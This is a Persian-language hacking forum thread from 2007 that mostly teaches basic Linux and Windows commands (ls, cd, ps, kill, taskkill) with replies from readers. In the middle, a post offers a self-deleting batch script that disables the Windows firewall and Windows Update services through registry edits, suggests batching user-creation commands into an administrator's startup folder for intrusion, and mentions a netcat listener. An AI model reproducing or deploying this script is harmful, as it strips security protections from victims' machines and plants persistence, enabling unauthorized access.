آموزش هك از پايه

[ADRIEN]

براي ديدن محتويات يك دايركتوري(پوشه) از فرمان ls كمك ميگيريم مشابه dir در ويندوز
كه اگر تايپ كنيم ls -a محتويات همراه فايلهاي مخفي نمايش داده ميشن كه اين فرمان علاوه بر سوييچ a- سوييچهاي ديگري مثل l- داره كه يه سري اطلاعات ميده پس براي كسب اطلاعات بيشتر تايپ كنيد man ls
-----------------------------

---------------------------
اما گاهي اوقات پيش مياد كه از يه دايركتوري ls ميگيريم و محتويات اون در يك صفحه جا نميشه راه حل اينه كه از دستور ls به اينصورت استفاده كنم ls -a |more
---------------------------------------

-----------------------------------------
كه اين دستور مشابه dir /p در ويندوزه
------------------------------------------------

---------------------------------------------------

اما براي رفتن به مسير و دايركتوري ديگه از دستور cd استفاده ميكنم
مسير فعلي من در Home هست كه حالا ميخام بهsbin واقع در usr برم usr/sbin
پس ميتونم بنويسم cd /usr
cd /sbin
-------------------------

------------------------------
يا اينكه كل مسير رو يه جا بنويسم
و اما در هر مسيري كه باشم واسه برگشت به home كافيه تايپ كنم cd
يه نكته(راستي بعد از نوشتن دستورات اينتر فراموش نشه<<شوخي كردم!!!!<<<
براي اينكه بدونيم الان در چه مسيري هستيم كافيه بنويسم pwd
--------------------------------------------------------

--------------------------------------

فايلها و پوشه ها
براي كپي كردن يك فايل از فرمان cp استفاده ميكنم به شكل cp filename Destin
--------------------------------

--------------------------------------
دقت كنيد كه من واسه اينكه بتونم فايل zic رو كپي كنم با فرمان su root به كاربر ريشه سوييچ كردم اونوقت فرمان كپي صادر كردم

براي جابه جايي يك فايل از دستور mv به اين شكل استفاده ميكنم mv filename/newmasir

براي حذف يك فايل از فرمان rm كمك ميگيريم به صورت : rm filename
-------------------------

------------------------------
در مثال بالا همونجور كه ميبينيد من نتونستم clock حذف كنم چون اجازه نداشتم پس مجبور شدم به يوزر ريشه لوگين كنم و بعد اونو حذف كنم
اما يه نكته مهم اينكه علامت اعلان در root شارپ هست# و در يوزراي ديگه $

پوشه ها
اما براي ساخت يه پوشه از دستور از دستور mkdir (مخفف make directory) كمك ميگيريم
پس مينويسم mkdir br4v3 كه با اين دستور در مسير جاري يه پوشه ساخته ميشه به اسم br4v3
باور نداريد يه dir بگيريد)

براي حذف دايركتوري كه ساختم از فرمان rmdir استفاده ميكنم پس مينويسم rmdir br4v3

نكته:براي ديدن ليستي از دستورات كه تو terminal جاري استفاده شده مينويسم history
كه history فرمان بسيار جالبي هستش

ايجاد يك فايل و ديدن اون
براي ايجاد يك فايل راهاي زيادي هست(فرمان touch,...)
من در اينجا ميخام يه فايل متني با ويرايشگر قدرتمند Vi ايجاد كنم
1-در خط فرمان مينويسم vi و سپس اينتر حالا وارد ويرايشگر vi شديم
2-براي اينكه وارد Insert Mode بشم تا بتونم متني رو تايپ كنم بايد بنويسم i
3-وقتي كه متن رو نوشتم براي سيو بايد كليد Escape رو بزنم
4-سپس بنويسم w max:
--------------------------------

------------------------------------
كه با اين دستور فايل متني به اسم max در مسير جاري ايجاد ميشه
5-براي خروج هم بايد بنويسم exit:

ديدن فايل
براي ديدن يك فايل از دستور more filename استفاده ميكنم
ابتدا يه ls ميگيرم و ميبينم كه فايل متني max ايجاد شده
حالا ميخام محتويات اونرو ببينم
پس مينويسم more max
--------------------------------

------------------------------------
اين دستور More جهت ديدن محتويات مثل type تو ويندوزه
By:Majeed $-2007
Br4v3_0n3[at]Y!.c0m

[ADRIEN]

امروز يه نكته بين آموزشي داريم!!!
بچ فايل كدهايي بودن كه در قديم(همين Dos خودمون كه تو ايران جديده!!!!!) استفاده ميشدند
در گذشته چون از خط فرمان استفاده گسترده ميشد مانند يونيكس و داس براي بعضي كارهاي تكراري و فرمانها از Batch استفاده ميشد كه شبه زبان هم به حساب مياد
الان ميشه اين كدهارو تو Notepad نوشت و با پسوند Bat سيو كرد و تو لوكال(كامپيوتر شخصي) يا ريموت (مثلا يه سرور) و ......... ازش استفاده كرد
پس خيلي مهمه
براي مثال كد زير رو تو Notepad كپي پيست كنيد و سپس با پسوند bat(مثلا majeed.bat) سيو كنيد و سپس اجرا
توضيح اين كد با دستكاري تو رجيستري و ......باعث غير فعال شدن فايروال ميشه با echo شروع م
كه ميشه خيلي كارا با بچ فايلها كرد

@echo off
net stop SharedAccess
ECHO REGEDIT4 >"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess] >>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv] >>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg"
ECHO.>> "%Temp%.\kill.reg"
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
Exit




اين سايت هم بچ فايلهاي خوبي داره اين يه نمونه

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

اين هم بچ فايل بالا كه با پسوند bat سيو كردم و بعد از اجرا حذف ميشه براي ديدن محتويات هم روش كليك رايت كنيد وسپس Edit

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

يه نكته كه لازمه بايد بگم دستوراتي رو كه براي ساختن يوزر گفتيم ميشه بچ كرد و تو استارت آپ ادمين گذاشت!!!!
ديگه ابتكار با خوتون حس نفوذگري رو بكار بندازين
By:Majeed $ 2007

[Ar@m]

می گم که دستت درد نکنه واقعا عالین
می شه یه ذره هم راجع به برنامه نویسی برای هک کردن بگی؟
من یه برنامه دیدم که برای اسکن کردن از پورت های tcp و udp بکار می رفت اما نفهمیدم چطوری نوشته شده یعنی یه سری توابع خاص برای اینکار داریم یا همه شو باید خودمون تعریف کنیم؟ اگه اینطوره چطوری می شه یه پورت رو برای سیستم تعریف کرد؟
اگه یه برنامه خیلی ساده براش مثال بزنی دیگه عالیه

[ADRIEN]

می گم که دستت درد نکنه واقعا عالین
می شه یه ذره هم راجع به برنامه نویسی برای هک کردن بگی؟
من یه برنامه دیدم که برای اسکن کردن از پورت های tcp و udp بکار می رفت اما نفهمیدم چطوری نوشته شده یعنی یه سری توابع خاص برای اینکار داریم یا همه شو باید خودمون تعریف کنیم؟ اگه اینطوره چطوری می شه یه پورت رو برای سیستم تعریف کرد؟
اگه یه برنامه خیلی ساده براش مثال بزنی دیگه عالیه

اون كه حتما
از C گرفته تا Vb
در مورد پورت اسكنر ساده يه نمونه همون namp يا حتي ميشه با نتكت اين كارو انجام داد سورسشم كه هست براي مثال با netcat
با دستور Nc -l -p 7800 پورت شماره 7800 روي سيستم باز ميشه
اگر اجازه بدي بعدا مفصل كه از client اومديم بيرون همه چيز گفته ميشه

يادم رفت بگم يه راه ساده
از كمپوننت Winsock تو Visual Basic ميتوني استفاده بكني هم tcpهم udp
اگه لازمت باشه ميگم
اينم بگم با همين كمپوننت over flow ميشه ترتيب !!!!!!!!!!!!!!!

[ADRIEN]

مطلبي راجع به Batch file تو Wikipedia

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

[Ar@m]

مرسی
درسته همون كمپوننت Winsock بود نمی دونستم تو Visual Basic داریم!

[ADRIEN]

براي دسترسي به اطلاعاتي در مورد سيستم عامل از دستور uname و سوييچهاي مختلفش استفاده ميكنيم
براي مثال uname -a يعني تمامي اطلاعات(all) رو چاپ كن
-------------

-----------------------------

Processes
براي ليست كردن تمامي Process هاي در حال اجرا از دستور ps -aux استفاده ميكنيم
------------------------------

-------------------------------------
اما توضيحات كه واقعا نيازي نيست ولي ميگم
ستون User:كه نام كاربره و Processe اون
ستون PID:شماره پروسس مورد نظر
ستونهايCPU , MEM:هم كه معلومه
ستون آخر هم كه مسير اجرايي پروسس ميشه

و براي ليست كردن پروسسهاي كاربر جاري از دستور ps -ux استفاده ميكنيم
--------------------------------------

----------------------------------------
دستور بالا مشابه دستور Tasklist در ويندوزه كه اين دستور هم پارامترهاي زيادي داره پس ?/ Tasklist فراموش نشه
براي مثال يكي از سوييچهاي مهم tasklist /m
------------------------------------------------------

------------------------------------------------------------

متوقف كردن يك پروسس(فرآيند) در حال اجرا
براي انجام اينكار از دستور Kill به شكل Kill Nameid كمك ميگيرم
الان من ميخام Terminal رو متوقف كنم پس ابتدا تايپ ميكنم ps -ux تا PID مربوط رو ببينم
---------------------------

------------------------------------
پس PID اون ميشه 3125 حالا مينويسم Kill 3125 و تمام
نكته:براي kill كردن برخي پروسسها لازمه با دستور su روت شد

ابن دستور مشابه دستور taskkill تو ويندوزه ابتدا ?/ taskkill فراموش نشه چون پارامترهاي زياده داره اين دستور
----------------------

------------------------------
مثال:ميخام برنامه Notepad در حال اجراي خودم رو ببندم
مينويسم
taskkill /f /im notepad.exe

يا ميتونم PID اون رو با tasklist بدست بيارم و بنويسم
taskkill /pid 2744
-------------------------------------

--------------------------------------

PID در مطالب بالا مخفف Process ID
اميدوارم اين قسمت مهم كه هم در لوكال و هم در ريموت كارايي زيادي داره مورد توجه قرار گرفته باشه
من اين دستورات مشابه رو هم ميگم كه يه مقايسه اي بين خط فرمان دو سيستم عامل باشه
By:Majeed $ 2007
Br4v3_0n3[at]Y!.c0m

[ADRIEN]

از بازديد و حمايت همگي ممنون

[BEHZAD2007]

با سلام به majeed76 عزیز. آقا کولاک کردی من مدت ها دنبال همچین مقاله ای بودم. دستت درد نکند.
ما منتظر بقیش هم هستیم . امیدوارم موفق باشی.
راستی یه سوال؟ اینارو چه جوری یاد گرفتی . ممنون

[LeBron]

سلام من یه سوال دارم
با زبان Python میشه برنامه نویسی ِ هک رو انجام داد؟